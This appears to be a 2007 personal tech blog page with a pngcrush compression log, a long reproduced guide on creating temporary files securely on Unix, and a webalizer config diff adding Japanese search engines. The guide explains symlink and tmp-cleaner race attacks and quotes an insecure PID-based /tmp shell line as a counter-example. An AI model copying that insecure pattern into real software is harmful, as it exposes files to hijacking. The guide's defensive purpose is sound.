[地図ログ] [vuhung@aoclife pngcrush-1.6.4]$ ./pngcrush 14_1689_295.png 14_1689_295.png.crush | pngcrush 1.6.4 | Copyright (C) 1998-2002,2006 Glenn Randers-Pehrson | Copyright (C) 2005 Greg Roelofs | This is a free, open-source program. Permission is irrevocably | granted to everyone to use this version of pngcrush without | payment of any fee. | Executable name is pngcrush | It was built with libpng version 1.2.11beta4, and is | running with libpng version 1.2.11beta4 - June 7, 2006 (header) | Copyright (C) 1998-2004,2006 Glenn Randers-Pehrson, | Copyright (C) 1996, 1997 Andreas Dilger, | Copyright (C) 1995, Guy Eric Schalnat, Group 42 Inc., | and zlib version 1.2.3, Copyright (C) 1998-2002 (or later), | Jean-loup Gailly and Mark Adler. | It was compiled with gcc version 4.1.1 20070105 (Red Hat 4.1.1-52) and gas version 2.17.50.0.6-2.el5. Recompressing 14_1689_295.png Total length of data found in IDAT chunks = 24878 unknown chunk handling done. IDAT length with method 1 (fm 0 zl 4 zs 0) = 25646 IDAT length with method 2 (fm 1 zl 4 zs 0) = 29197 IDAT length with method 3 (fm 5 zl 4 zs 1) = 31397 IDAT length with method 4 (fm 0 zl 9 zs 1) = 25218 IDAT length with method 7 (fm 0 zl 9 zs 0) = 24212 Best pngcrush method = 7 (fm 0 zl 9 zs 0) for 14_1689_295.png.crush (2.68% IDAT reduction) (2.75% filesize reduction) CPU time used = 0.210 seconds (decoding 0.030, encoding 0.180, other 0.000 seconds) [vuhung@aoclife pngcrush-1.6.4]$ ls -l 14_1689_295.png* -rw-rw-r-- 1 vuhung vuhung 25565 12\u6708 9 03:20 14_1689_295.png -rw-rw-r-- 1 vuhung vuhung 24863 12\u6708 9 03:20 14_1689_295.png.crush [google] [vuhung@aoclife pngcrush-1.6.4]$ ./pngcrush mt_024.png mt_024.png.crush | pngcrush 1.6.4 | Copyright (C) 1998-2002,2006 Glenn Randers-Pehrson | Copyright (C) 2005 Greg Roelofs | This is a free, open-source program. Permission is irrevocably | granted to everyone to use this version of pngcrush without | payment of any fee. | Executable name is pngcrush | It was built with libpng version 1.2.11beta4, and is | running with libpng version 1.2.11beta4 - June 7, 2006 (header) | Copyright (C) 1998-2004,2006 Glenn Randers-Pehrson, | Copyright (C) 1996, 1997 Andreas Dilger, | Copyright (C) 1995, Guy Eric Schalnat, Group 42 Inc., | and zlib version 1.2.3, Copyright (C) 1998-2002 (or later), | Jean-loup Gailly and Mark Adler. | It was compiled with gcc version 4.1.1 20070105 (Red Hat 4.1.1-52) and gas version 2.17.50.0.6-2.el5. Recompressing mt_024.png Total length of data found in IDAT chunks = 16658 unknown chunk handling done. IDAT length with method 1 (fm 0 zl 4 zs 0) = 17939 IDAT length with method 2 (fm 1 zl 4 zs 0) = 20757 IDAT length with method 3 (fm 5 zl 4 zs 1) = 25521 IDAT length with method 4 (fm 0 zl 9 zs 1) = 17030 IDAT length with method 7 (fm 0 zl 9 zs 0) = 16686 Best pngcrush method = 0 (fm 5 zl 9 zs 1) for mt_024.png.crush (no IDAT change) (no filesize change) CPU time used = 0.220 seconds (decoding 0.020, encoding 0.180, other 0.020 seconds)

Dec 3, 2007

Good Temporary Files ( or randomness )

This issue of correctly performing atomic operations particularly comes up when creating temporary files. Temporary files in Unix-like systems are traditionally created in the /tmp or /var/tmp directories, which are shared by all users. A common trick by attackers is to create symbolic links in the temporary directory to some other file (e.g., /etc/passwd) while your secure program is running. The attacker's goal is to create a situation where the secure program determines that a given filename doesn't exist, the attacker then creates the symbolic link to another file, and then the secure program performs some operation (but now it actually opened an unintended file). Often important files can be clobbered or modified this way. There are many variations to this attack, such as creating normal files, all based on the idea that the attacker can create (or sometimes otherwise access) file system objects in the same directory used by the secure program for temporary files. Michal Zalewski exposed in 2002 another serious problem with temporary directories involving automatic cleaning of temporary directories. For more information, see his posting to Bugtraq dated December 20, 2002, (subject "[RAZOR] Problems with mkstemp()"). Basically, Zalewski notes that it's a common practice to have a program automatically sweep temporary directories like /tmp and /var/tmp and remove "old" files that have not been accessed for a while (e.g., several days). Such programs are sometimes called "tmp cleaners" (pronounced "temp cleaners"). Possibly the most common tmp cleaner is "tmpwatch" by Erik Troan and Preston Brown of Red Hat Software; another common one is 'stmpclean' by Stanislav Shalunov; many administrators roll their own as well. Unfortunately, the existance of tmp cleaners creates an opportunity for new security-critical race conditions; an attacker may be able to arrange things so that the tmp cleaner interferes with the secure program. For example, an attacker could create an "old" file, arrange for the tmp cleaner to plan to delete the file, delete the file himself, and run a secure program that creates the same file - now the tmp cleaner will delete the secure program's file! Or, imagine that a secure program can have long delays after using the file (e.g., a setuid program stopped with SIGSTOP and resumed after many days with SIGCONT, or simply intentionally creating a lot of work). If the temporary file isn't used for long enough, its temporary files are likely to be removed by the tmp cleaner. The general problem when creating files in these shared directories is that you must guarantee that the filename you plan to use doesn't already exist at time of creation, and atomically create the file. Checking ``before'' you create the file doesn't work, because after the check occurs, but before creation, another process can create that file with that filename. Using an ``unpredictable'' or ``unique'' filename doesn't work in general, because another process can often repeatedly guess until it succeeds. Once you create the file atomically, you must alway use the returned file descriptor (or file stream, if created from the file descriptor using routines like fdopen()). You must never re-open the file, or use any operations that use the filename as a parameter - always use the file descriptor or associated stream. Otherwise, the tmpwatch race issues noted above will cause problems. You can't even create the file, close it, and re-open it, even if the permissions limit who can open it. Note that comparing the descriptor and a reopened file to verify inode numbers, creation times or file ownership is not sufficient - please refer to "Symlinks and Cryogenic Sleep" by Olaf Kirch. Fundamentally, to create a temporary file in a shared (sticky) directory, you must repetitively: (1) create a ``random'' filename, (2) open it using O_CREAT | O_EXCL and very narrow permissions (which atomically creates the file and fails if it's not created), and (3) stop repeating when the open succeeds. According to the 1997 ``Single Unix Specification'', the preferred method for creating an arbitrary temporary file (using the C interface) is tmpfile(3). The tmpfile(3) function creates a temporary file and opens a corresponding stream, returning that stream (or NULL if it didn't). Unfortunately, the specification doesn't make any guarantees that the file will be created securely. In earlier versions of this book, I stated that I was concerned because I could not assure myself that all implementations do this securely. I've since found that older System V systems have an insecure implementation of tmpfile(3) (as well as insecure implementations of tmpnam(3) and tempnam(3)), so on at least some systems it's absolutely useless. Library implementations of tmpfile(3) should securely create such files, of course, but users don't always realize that their system libraries have this security flaw, and sometimes they can't do anything about it. Kris Kennaway recommends using mkstemp(3) for making temporary files in general. His rationale is that you should use well-known library functions to perform this task instead of rolling your own functions, and that this function has well-known semantics. This is certainly a reasonable position. I would add that, if you use mkstemp(3), be sure to use umask(2) to limit the resulting temporary file permissions to only the owner. This is because some implementations of mkstemp(3) (basically older ones) make such files readable and writable by all, creating a condition in which an attacker can read or write private data in this directory. A minor nuisance is that mkstemp(3) doesn't directly support the environment variables TMP or TMPDIR (as discussed below), so if you want to support them you have to add code to do so. Here's a program in C that demonstrates how to use mkstemp(3) for this purpose, both directly and when adding support for TMP and TMPDIR: #include #include #include #include void failure(msg) { fprintf(stderr, "%s\n", msg); exit(1); } /* * Given a "pattern" for a temporary filename * (starting with the directory location and ending in XXXXXX), * create the file and return it. * This routines unlinks the file, so normally it won't appear in * a directory listing. * The pattern will be changed to show the final filename. */ FILE *create_tempfile(char *temp_filename_pattern) { int temp_fd; mode_t old_mode; FILE *temp_file; old_mode = umask(077); /* Create file with restrictive permissions */ temp_fd = mkstemp(temp_filename_pattern); (void) umask(old_mode); if (temp_fd == -1) { failure("Couldn't open temporary file"); } if (!(temp_file = fdopen(temp_fd, "w+b"))) { failure("Couldn't create temporary file's file descriptor"); } if (unlink(temp_filename_pattern) == -1) { failure("Couldn't unlink temporary file"); } return temp_file; } /* * Given a "tag" (a relative filename ending in XXXXXX), * create a temporary file using the tag. The file will be created * in the directory specified in the environment variables * TMPDIR or TMP, if defined and we aren't setuid/setgid, otherwise * it will be created in /tmp. Note that root (and su'd to root) * _will_ use TMPDIR or TMP, if defined. * */ FILE *smart_create_tempfile(char *tag) { char *tmpdir = NULL; char *pattern; FILE *result; if ((getuid()==geteuid()) && (getgid()==getegid())) { if (! ((tmpdir=getenv("TMPDIR")))) { tmpdir=getenv("TMP"); } } if (!tmpdir) {tmpdir = "/tmp";} pattern = malloc(strlen(tmpdir)+strlen(tag)+2); if (!pattern) { failure("Could not malloc tempfile pattern"); } strcpy(pattern, tmpdir); strcat(pattern, "/"); strcat(pattern, tag); result = create_tempfile(pattern); free(pattern); return result; } main() { int c; FILE *demo_temp_file1; FILE *demo_temp_file2; char demo_temp_filename1[] = "/tmp/demoXXXXXX"; char demo_temp_filename2[] = "second-demoXXXXXX"; demo_temp_file1 = create_tempfile(demo_temp_filename1); demo_temp_file2 = smart_create_tempfile(demo_temp_filename2); fprintf(demo_temp_file2, "This is a test.\n"); printf("Printing temporary file contents:\n"); rewind(demo_temp_file2); while ( (c=fgetc(demo_temp_file2)) != EOF) { putchar(c); } putchar('\n'); printf("Exiting; you'll notice that there are no temporary files on exit.\n"); } Kennaway states that if you can't use mkstemp(3), then make yourself a directory using mkdtemp(3), which is protected from the outside world. However, as Michal Zalewski notes, this is a bad idea if there are tmp cleaners in use; instead, use a directory inside the user's HOME. Finally, if you really have to use the insecure mktemp(3), use lots of X's - he suggests 10 (if your libc allows it) so that the filename can't easily be guessed (using only 6 X's means that 5 are taken up by the PID, leaving only one random character and allowing an attacker to mount an easy race condition). Note that this is fundamentally insecure, so you should normally not do this. I add that you should avoid tmpnam(3) as well - some of its uses aren't reliable when threads are present, and it doesn't guarantee that it will work correctly after TMP_MAX uses (yet most practical uses must be inside a loop). In general, you should avoid using the insecure functions such as mktemp(3) or tmpnam(3), unless you take specific measures to counter their insecurities or test for a secure library implementation as part of your installation routines. If you ever want to make a file in /tmp or a world-writable directory (or group-writable, if you don't trust the group) and don't want to use mk*temp() (e.g. you intend for the file to be predictably named), then always use the O_CREAT and O_EXCL flags to open() and check the return value. If you fail the open() call, then recover gracefully (e.g. exit). The GNOME programming guidelines recommend the following C code when creating filesystem objects in shared (temporary) directories to securely open temporary files [Quintero 2000]: char *filename; int fd; do { filename = tempnam (NULL, "foo"); fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600); free (filename); } while (fd == -1); Note that, although the insecure function tempnam(3) is being used, it is wrapped inside a loop using O_CREAT and O_EXCL to counteract its security weaknesses, so this use is okay. Note that you need to free() the filename. You should close() and unlink() the file after you are done. If you want to use the Standard C I/O library, you can use fdopen() with mode "w+b" to transform the file descriptor into a FILE *. Note that this approach won't work over NFS version 2 (v2) systems, because older NFS doesn't correctly support O_EXCL. Note that one minor disadvantage to this approach is that, since tempnam can be used insecurely, various compilers and security scanners may give you spurious warnings about its use. This isn't a problem with mkstemp(3). If you need a temporary file in a shell script, you're probably best off using pipes, using a local directory (e.g., something inside the user's home directory), or in some cases using the current directory. That way, there's no sharing unless the user permits it. If you really want/need the temporary file to be in a shared directory like /tmp, do not use the traditional shell technique of using the process id in a template and just creating the file using normal operations like ">". Shell scripts can use "$$" to indicate the PID, but the PID can be easily determined or guessed by an attacker, who can then pre-create files or links with the same name. Thus the following "typical" shell script is unsafe: echo "This is a test" > /tmp/test$$ # DON'T DO THIS. If you need a temporary file or directory in a shell script, and you want it in /tmp, a solution sometimes suggested is to use mktemp(1), which is intended for use in shell scripts (note that mktemp(1) and mktemp(3) are different things). However, as Michal Zalewski notes, this is insecure in many environments that run tmp cleaners; the problem is that when a privileged program sweeps through a temporary directory, it will probably expose a race condition. Even if this weren't true, I do not recommend using shell scripts that create temporary files in shared directories; creating such files in private directories or using pipes instead is generally preferable, even if you're sure your tmpwatch program is okay (or that you have no local users). If you must use mktemp(1), note that mktemp(1) takes a template, then creates a file or directory using O_EXCL and returns the resulting name; thus, mktemp(1) won't work on NFS version 2 filesystems. Here are some examples of correct use of mktemp(1) in Bourne shell scripts; these examples are straight from the mktemp(1) man page: # Simple use of mktemp(1), where the script should quit # if it can't get a safe temporary file. # Note that this will be INSECURE on many systems, since they use # tmpwatch-like programs that will erase "old" files and expose race # conditions. TMPFILE=`mktemp /tmp/$0.XXXXXX` || exit 1 echo "program output" >> $TMPFILE # Simple example, if you want to catch the error: TMPFILE=`mktemp -q /tmp/$0.XXXXXX` if [ $? -ne 0 ]; then echo "$0: Can't create temp file, exiting..." exit 1 fi Perl programmers should use File::Temp, which tries to provide a cross-platform means of securely creating temporary files. However, read the documentation carefully on how to use it properly first; it includes interfaces to unsafe functions as well. I suggest explicitly setting its safe_level to HIGH; this will invoke additional security checks. The Perl 5.8 documentation of File::Temp is available on-line. Don't reuse a temporary filename (i.e. remove and recreate it), no matter how you obtained the ``secure'' temporary filename in the first place. An attacker can observe the original filename and hijack it before you recreate it the second time. And of course, always use appropriate file permissions. For example, only allow world/group access if you need the world or a group to access the file, otherwise keep it mode 0600 (i.e., only the owner can read or write it). Clean up after yourself, either by using an exit handler, or making use of UNIX filesystem semantics and unlink()ing the file immediately after creation so the directory entry goes away but the file itself remains accessible until the last file descriptor pointing to it is closed. You can then continue to access it within your program by passing around the file descriptor. Unlinking the file has a lot of advantages for code maintenance: the file is automatically deleted, no matter how your program crashes. It also decreases the likelihood that a maintainer will insecurely use the filename (they need to use the file descriptor instead). The one minor problem with immediate unlinking is that it makes it slightly harder for administrators to see how disk space is being used, since they can't simply look at the file system by name. You might consider ensuring that your code for Unix-like systems respects the environment variables TMP or TMPDIR if the provider of these variable values is trusted. By doing so, you make it possible for users to move their temporary files into an unshared directory (and eliminating the problems discussed here), such as a subdirectory inside their home directory. Recent versions of Bastille can set these variables to reduce the sharing between users. Unfortunately, many users set TMP or TMPDIR to a shared directory (say /tmp), so your secure program must still correctly create temporary files even if these environment variables are set. This is one advantage of the GNOME approach, since at least on some systems tempnam(3) automatically uses TMPDIR, while the mkstemp(3) approach requires more code to do this. Please don't create yet more environment variables for temporary directories (such as TEMP), and in particular don't create a different environment name for each application (e.g., don't use "MYAPP_TEMP"). Doing so greatly complicates managing systems, and users wanting a special temporary directory for a specific application can just set the environment variable specially when running that particular application. Of course, if these environment variables might have been set by an untrusted source, you should ignore them - which you'll do anyway if you follow the advice in Section 5.2.3. These techniques don't work if the temporary directory is remotely mounted using NFS version 2 (NFSv2), because NFSv2 doesn't properly support O_EXCL. See Section 7.10.2.1 for more information. NFS version 3 and later properly support O_EXCL; the simple solution is to ensure that temporary directories are either local or, if mounted using NFS, mounted using NFS version 3 or later. There is a technique for safely creating temporary files on NFS v2, involving the use of link(2) and stat(2), but it's complex; see Section 7.10.2.1 which has more information about this. As an aside, it's worth noting that FreeBSD has recently changed the mk*temp() family to get rid of the PID component of the filename and replace the entire thing with base-62 encoded randomness. This drastically raises the number of possible temporary files for the "default" usage of 6 X's, meaning that even mktemp(3) with 6 X's is reasonably (probabilistically) secure against guessing, except under very frequent usage. However, if you also follow the guidance here, you'll eliminate the problem they're addressing. Much of this information on temporary files was derived from Kris Kennaway's posting to Bugtraq about temporary files on December 15, 2000. I should note that the Openwall Linux patch from http://www.openwall.com/linux/ includes an optional ``temporary file directory'' policy that counters many temporary file based attacks. The Linux Security Module (LSM) project includes an "owlsm" module that implements some of the OpenWall ideas, so Linux Kernels with LSM can quickly insert these rules into a running system. When enabled, it has two protections: * Hard links: Processes may not make hard links to files in certain cases. The OpenWall documentation states that "Processes may not make hard links to files they do not have write access to." In the LSM version, the rules are as follows: if both the process' uid and fsuid (usually the same as the euid) is is different from the linked-to-file's uid, the process uid is not root, and the process lacks the FOWNER capability, then the hard link is forbidden. The check against the process uid may be dropped someday (they are work-arounds for the atd(8) program), at which point the rules would be: if both the process' fsuid (usually the same as the euid) is is different from the linked-to-file's uid and and the process lacks the FOWNER capability, then the hard link is forbidden. In other words, you can only create hard links to files you own, unless you have the FOWNER capability. * Symbolic links (symlinks): Certain symlinks are not followed. The original OpenWall documentation states that "root processes may not follow symlinks that are not owned by root", but the actual rules (from looking at the code) are more complicated. In the LSM version, if the directory is sticky ("+t" mode, used in shared directories like /tmp), symlinks are not followed if the symlink was created by anyone other than either the owner of the directory or the current process' fsuid (which is usually the effective uid). Many systems do not implement this openwall policy, so you can't depend on this in general protecting your system. However, I encourage using this policy on your own system, and please make sure that your application will work when this policy is in place.

Nov 29, 2007

How did they find me through search engines?

[root@aoclife etc]# diff -u webalizer.conf.2007-11-29.no.JP.searchEngine webalizer.conf --- webalizer.conf.2007-11-29.no.JP.searchEngine 2007-11-29 23:34:18.000000000 +0900 +++ webalizer.conf 2007-11-29 23:34:38.000000000 +0900 @@ -529,6 +529,16 @@ SearchEngine alltheweb.com query= SearchEngine northernlight.com qr= + +SearchEngine infoseek.co.jp qt= +SearchEngine excite.co.jp search= +SearchEngine yahoo.co.jp p= +SearchEngine yahoo.co.jp q= +SearchEngine google.co.jp q= +SearchEngine goo.ne.jp MT= +SearchEngine biglobe.ne.jp q= +SearchEngine msn.co.jp q= + # The Dump* keywords allow the dumping of Sites, URL's, Referrers # User Agents, Usernames and Search strings to seperate tab delimited # text files, suitable for import into most database or spreadsheet [root@aoclife etc]#